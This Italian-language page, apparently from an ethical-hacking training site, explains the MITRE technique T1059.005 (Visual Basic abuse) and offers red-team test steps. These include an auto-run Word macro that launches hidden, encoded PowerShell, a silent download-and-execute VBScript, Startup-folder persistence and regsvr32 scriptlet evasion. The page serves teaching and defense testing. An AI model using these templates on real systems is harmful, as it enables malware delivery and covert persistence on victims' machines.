Visual Basic: Command Scripting Interpreter - Visual Basic (T1059.005)

Visual Basic rappresenta una famiglia di linguaggi di programmazione Microsoft che include VBScript, VBA e VB.NET, ampiamente sfruttati dagli attaccanti per l'esecuzione di codice maligno. Questa tecnica si manifesta nella fase di Execution (TA0002) della kill chain, permettendo agli avversari di eseguire comandi attraverso script apparentemente legittimi.

La pericolosità deriva dall'integrazione nativa con Windows e Office, che rende questi linguaggi difficili da distinguere dalle operazioni legittime. 45 gruppi APT hanno utilizzato questa tecnica in 15 campagne documentate, sfruttando 67 software malevoli che incorporano componenti Visual Basic.

VBA nelle macro Office rimane il vettore più comune, seguito da VBScript eseguito tramite wscript.exe o cscript.exe. Gli attaccanti nascondono spesso il codice maligno in documenti apparentemente innocui, sfruttando la fiducia degli utenti nelle comunicazioni aziendali.

Per testare le difese contro Visual Basic, inizia creando una macro VBA malevola in Word. Apri l'editor VBA con Alt+F11 e inserisci nel modulo ThisDocument:

Sub AutoOpen()
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run "powershell -nop -w hidden -enc <BASE64_PAYLOAD>"
End Sub

La macro si attiva automaticamente all'apertura del documento. Per distribuire VBScript standalone, crea un file .vbs che scarica ed esegue un payload:

cscript.exe download.vbs //B //Nologo

Il contenuto di download.vbs potrebbe includere tecniche di evasione come l'offuscamento delle stringhe. Lazarus Group ha dimostrato l'efficacia combinando VBA con doppia codifica Base64, mentre FIN7 preferisce catene complesse che concatenano VBScript con PowerShell.

Per simulare persistence, posiziona uno script VBS nella cartella di avvio: copy malicious.vbs "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

Su Linux con Wine o Mono, testa l'esecuzione cross-platform: mono vbnet_payload.exe. Questo approccio è raro ma documentato in ambienti ibridi.

Gli attaccanti più sofisticati come APT32 utilizzano scriptlet COM per bypassare restrizioni. Crea un file .sct con codice VBScript embedded e richiamalo via regsvr32 per evasione avanzata.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.